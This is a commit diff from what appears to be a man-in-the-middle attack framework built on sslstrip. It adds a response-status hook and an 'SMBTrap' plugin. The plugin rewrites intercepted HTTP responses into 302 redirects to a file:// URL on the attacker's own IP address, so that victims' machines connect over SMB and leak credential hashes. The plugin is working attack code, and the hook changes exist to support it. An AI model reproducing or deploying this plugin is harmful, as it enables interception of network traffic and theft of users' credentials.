handleStatus() is now hooked through serverResponseStatus, were now able to modify the server response code and message

added the SMBTrap plugin
2025-07-16 10:03:52 -07:00 · 2015-05-22 20:16:47 +02:00 · 2015-05-22 20:16:47 +02:00 · 840e202e5b
commit 840e202e5b
parent bdcee18be0
6 changed files with 36 additions and 2 deletions
--- a/core/sergioproxy/ProxyPlugins.py
+++ b/core/sergioproxy/ProxyPlugins.py
@ -44,7 +44,7 @@ class ProxyPlugins:
    _instance = None
    plist = []
-    mthdDict = {"connectionMade": "clientRequest", "handleResponse": "serverResponse", "handleHeader": "serverHeaders", "handleEndHeaders":"serverHeaders"}
+    mthdDict = {"connectionMade": "clientRequest", "handleStatus": "serverResponseStatus", "handleResponse": "serverResponse", "handleHeader": "serverHeaders", "handleEndHeaders":"serverHeaders"}
    pmthds = {}
    @staticmethod
--- a/core/servers/http/HTTPServer.py
+++ b/core/servers/http/HTTPServer.py
@ -14,6 +14,9 @@ class HTTPServer:
        return HTTPServer._instance
    def addHandler(self, urlregex, handler, vhost=''):
        self.application.add_handlers(vhost, [(urlregex, handler)])
    def start(self, port=80):
        self.application.listen(port)
        t = threading.Thread(name='HTTPserver', target=tornado.ioloop.IOLoop.instance().start)
--- a/core/sslstrip/ServerConnection.py
+++ b/core/sslstrip/ServerConnection.py
@ -120,6 +120,7 @@ class ServerConnection(HTTPClient):
            self.sendPostData()
    def handleStatus(self, version, code, message):
        version, code, message = self.plugins.hook()
        mitmf_logger.debug("[ServerConnection] Server response: {} {} {}".format(version, code, message))
        self.client.setResponseCode(int(code), message)
--- a/plugins/SMBTrap.py
+++ b/plugins/SMBTrap.py
@ -0,0 +1,23 @@
 import logging
 import random
 import string
 from plugins.plugin import Plugin
 from core.utils import SystemConfig
 mitmf_logger = logging.getLogger("mitmf")
 class SMBTrap(Plugin):
 	name = "SMBTrap"
 	optname = "smbtrap"
 	desc = "Exploits the SMBTrap vulnerability on connected clients"
 	version = "1.0"
 	has_opts = False
 	def initialize(self, options):
 		self.ourip = SystemConfig.getIP(options.interface)
 	def serverResponseStatus(self, request, version, code, message):
 		return (version, 302, "Found")
 	def serverHeaders(self, response, request):
 		response.headers["Location"] = "file://{}/{}".format(self.ourip, ''.join(random.sample(string.ascii_uppercase + string.digits, 8)))
--- a/plugins/TestPlugin.py
+++ b/plugins/TestPlugin.py
@ -10,7 +10,7 @@ class TestPlugin(Plugin):
    has_opts = False
    def initialize(self, options):
-        HTTPServer.getInstance().application.add_handlers('', [(r"/test", MainHandler)])
+        HTTPServer.getInstance().addHandler(r"/test/(.*)", MainHandler)
 class MainHandler(tornado.web.RequestHandler):
    def get(self):
--- a/plugins/plugin.py
+++ b/plugins/plugin.py
@ -12,6 +12,7 @@ class Plugin(ConfigWatcher, object):
    optname     = "generic"
    tree_info   = list()
    desc        = ""
    version     = "0.0"
    has_opts    = False
    def initialize(self, options):
@ -41,6 +42,12 @@ class Plugin(ConfigWatcher, object):
        '''
        pass
    def serverResponseStatus(self, request, version, code, message):
        '''
            Handles server response HTTP version, code and message
        '''
        return (version, code, message)
    def serverResponse(self, response, request, data):
        '''
            Handles all non-image responses by default, hooks handleResponse() (See Upsidedownternet for how to get images)